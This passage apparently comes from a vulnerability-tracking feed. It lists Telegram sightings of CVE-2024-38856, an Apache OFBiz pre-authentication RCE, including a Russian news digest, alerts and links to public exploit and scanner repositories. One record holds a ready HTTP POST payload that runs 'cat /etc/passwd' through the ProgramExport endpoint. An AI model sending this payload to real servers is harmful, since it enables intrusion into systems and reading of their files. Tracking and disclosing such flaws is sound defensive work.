\u0432\u0438\u0434\u0435\u043e.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430, \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u044e\u0449\u0430\u044f \u0438\u0437-\u0437\u0430 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0438 \u043e\u0447\u0438\u0441\u0442\u043a\u0438 \u0432\u0445\u043e\u0434\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0441 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u0443\u0440\u043e\u0432\u043d\u044f Contributor \u0438 \u0432\u044b\u0448\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438\u00a0\u043d\u0430\u0448\u043b\u0438\u00a0\u0441\u043f\u043e\u0441\u043e\u0431 \u0434\u0430\u043c\u043f\u0430 \u043a\u043e\u0440\u043d\u0435\u0432\u043e\u0433\u043e \u043a\u043b\u044e\u0447\u0430 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f (\u0438\u043b\u0438 Fuse Key0) \u0434\u043b\u044f Intel SGX.\n\n\u041c\u0435\u0442\u043e\u0434 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u0435\u0440\u0438\u044f\u0445 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0440\u043e\u0432,\u00a0\u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0443\u0436\u0435 \u043f\u0440\u0435\u043a\u0440\u0430\u0449\u0435\u043d\u0430. \n\n\u042d\u0442\u043e\u0442 \u043a\u043b\u044e\u0447 \u0442\u0435\u043f\u0435\u0440\u044c \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u0438 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438\u0437 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u0440\u0435\u0436\u0438\u043c\u0430 SGX \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u043a\u043b\u044e\u0447\u0435\u0439 Intel - \u0438\u043b\u0438 \u0434\u043b\u044f \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u0432\u043d\u0443\u0442\u0440\u0438.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u0430 \u043e\u0448\u0438\u0431\u043a\u043e\u0439 \u0432 \u043c\u0438\u043a\u0440\u043e\u043a\u043e\u0434\u0435 Intel. \u0412 \u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438, \u0441 \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u043e\u0447\u0438\u0441\u0442\u0438\u0442\u044c \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0439 \u0431\u0443\u0444\u0435\u0440, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0432\u0441\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0435\u0434\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u0435\u043b\u0435\u0439, \u0432\u043a\u043b\u044e\u0447\u0430\u044f FK0.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u041c\u0430\u0440\u043a\u0443\u0441 \u0425\u0430\u0442\u0447\u0438\u043d\u0441 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b \u0441\u0442\u0430\u0442\u044c\u044e\u00a0\u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 CVE-2024-38063 (CVSS 9,8), \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043f\u0440\u0438\u0448\u0435\u043b \u043a \u0432\u044b\u0432\u043e\u0434\u0443, \u0447\u0442\u043e \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0445 PoC (\u043d\u0430 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442) \u043d\u0435\u0442, \u0437\u0430 \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435\u043c \u044d\u0442\u043e\u0433\u043e, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 DoS.\n\nMobile Security Framework (MobSF) \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043c\u043e\u0431\u0438\u043b\u044c\u043d\u043e\u043c \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0435 \u0434\u043b\u044f \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0438\u043d\u0433\u0430, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0430\u0442\u0430\u043a ZIP Slip \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 MobSF.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043e\u0446\u0435\u043d\u043a\u0443 CVSS 9,8 \u0438 \u043f\u0440\u043e\u0441\u0442\u0430 \u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.\n\nRedTeam Pentensting \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 \u043e\u0442\u0447\u0435\u0442 \u043f\u043e CVE-2024-43425 - \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c Moodle.\n\n\u0421\u0442\u0430\u043b \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d PoC \u0434\u043b\u044f CVE-2024-38856, RCE \u0434\u043e \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432 Apache OFBiz, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439\u00a0\u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u043c\u0435\u0441\u044f\u0446\u0430.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u0431\u0430\u0437\u0443 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u043e\u0448\u0438\u0431\u043e\u043a CISA KEV.\n\nMicrosoft \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a\u0438, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0441\u0438\u043c\u0432\u043e\u043b\u044b ASCII \u0434\u043b\u044f \u043a\u0440\u0430\u0436\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0438\u0437 Copilot AI.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430 Trend Micro \u0440\u0430\u0441\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 CVE-2024-37079 \u0432 VMware vCenter Server, \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u044f \u043e\u0441\u043d\u043e\u0432\u043d\u0443\u044e \u043f\u0440\u0438\u0447\u0438\u043d\u0443 \u044d\u0442\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0438 \u0438 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u044f, \u043a\u0430\u043a \u0435\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f RCE.\n\n\u041f\u043e\u043a\u0430 \u043d\u0435 \u0431\u044b\u043b\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e \u043d\u0438 \u043e\u0434\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043d\u0435 \u0442\u0440\u0438\u0432\u0438\u0430\u043b\u044c\u043d\u0430.", "creation_timestamp": "2024-08-29T14:20:05.000000Z"}, {"uuid": "0e8da284-3fb7-4874-934d-a142eebc7402", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/DailyToolz/1212", "content": "https://github.com/ThatNotEasy/CVE-2024-38856", "creation_timestamp": "2024-08-10T05:15:00.000000Z"}, {"uuid": "4af0ad76-afd1-4c55-bfaf-65473daeafac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://t.me/thehackernews/5366", "content": "A zero-day vulnerability in Apache OFBiz ERP system has been disclosed, allowing remote code execution. \n \nThis vulnerability, CVE-2024-38856, has a critical CVSS score of 9.8, making it extremely dangerous for businesses using this software. \n \nRead: https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html \n \nShare this to raise awareness!", "creation_timestamp": "2024-08-06T06:18:37.000000Z"}, {"uuid": "c339abdb-0b85-4ac9-9e8c-5a861ba59dca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/thehackernews/5486", "content": "CISA has added a critical Apache OFBiz flaw, CVE-2024-38856, to its Known Exploited Vulnerabilities list. It allows RCE attacks, putting countless businesses at serious risk. \n \nhttps://thehackernews.com/2024/08/cisa-flags-critical-apache-ofbiz-flaw.html \n \nPoC exploits are already public, so update your systems immediately.", "creation_timestamp": "2024-08-28T07:44:22.000000Z"}, {"uuid": "028a994c-1a12-4814-b75d-24699d092acd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/9015", "content": "GitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner", "creation_timestamp": "2024-08-10T09:29:50.000000Z"}, {"uuid": "d5afae69-b8cb-48e9-9c9f-e43469016ccd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2953", "content": "Apache OFBiz CVE-2024-38856\n\nPOST /webtools/control/main/ProgramExport HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 68\n\ngroovyProgram=throw new Exception('cat /etc/passwd'.execute().text);\n\n#exploit #poc", "creation_timestamp": "2024-08-06T09:58:15.000000Z"}, {"uuid": "8d2f3bfa-2030-43da-be15-2590cf407f9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11004", "content": "#exploit\n1. CVE-2024-7646:\nIngress-NGINX Annotation Validation Bypass\nhttps://www.armosec.io/blog/cve-2024-7646-ingress-nginx-annotation-validation-bypass\n\n2. CVE-2024-38856:\nApache OFBiz Pre-Authentication RCE (Scanner + Exploit)\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner", "creation_timestamp": "2024-08-19T21:16:17.000000Z"}, {"uuid": "fdf54fb0-67c3-4361-bb6f-8a809f923def", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/18", "content": "Tools  - Hackers Factory \n\nSharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them. If you are a low-privileged service user, you can even use it to upgrade to \"NT AUTHORITY\\SYSTEM\" privileges, and you can switch to the target user's desktop to do more without the target user's password.\n\nhttps://github.com/BeichenDream/SharpToken\n\nCVE-2024-7928 POC for CVE-2024-7928. Will attempt to retrieve DB details for FastAdmin instances.\n\nhttps://github.com/bigb0x/CVE-2024-7928\n\nTunnel TCP connections through a file.\n\nhttps://github.com/fiddyschmitt/File-Tunnel\n\nFor Ethical Usage only, Any harmful or malicious activities are not allowed. And it's your own responsibility.\n\nCVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\ntoxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js).\n\nhttps://github.com/t3l3machus/toxssin\n\nWapiti - Web Vulnerability Scanner\n\nhttps://github.com/wapiti-scanner/wapiti\n\nWhatWaf\n\nDetect and bypass web application firewalls and protection systems \n\nhttps://github.com/Ekultek/WhatWaf\n\nThe Web Application Firewall Fingerprinting Tool\n\nhttps://github.com/EnableSecurity/wafw00f\n\n#CyberDilara #CyberBulletin #HackersFactory\n\nhttps://t.me/dilagrafie\nhttps://t.me/CyberDilara\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-08-22T12:10:29.000000Z"}, {"uuid": "271d39ab-e250-4f85-8ba1-25f558d59794", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/4060", "content": "#exploit\n1. CVE-2024-7646:\nIngress-NGINX Annotation Validation Bypass\nhttps://www.armosec.io/blog/cve-2024-7646-ingress-nginx-annotation-validation-bypass\n\n2. CVE-2024-38856:\nApache OFBiz Pre-Authentication RCE (Scanner + Exploit)\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner", "creation_timestamp": "2024-08-19T09:17:15.000000Z"}, {"uuid": "bcf1af9e-591e-4a53-9a72-2ee3789f97ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/zero_day_uz/507", "content": "GitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner", "creation_timestamp": "2025-10-07T03:56:44.000000Z"}]}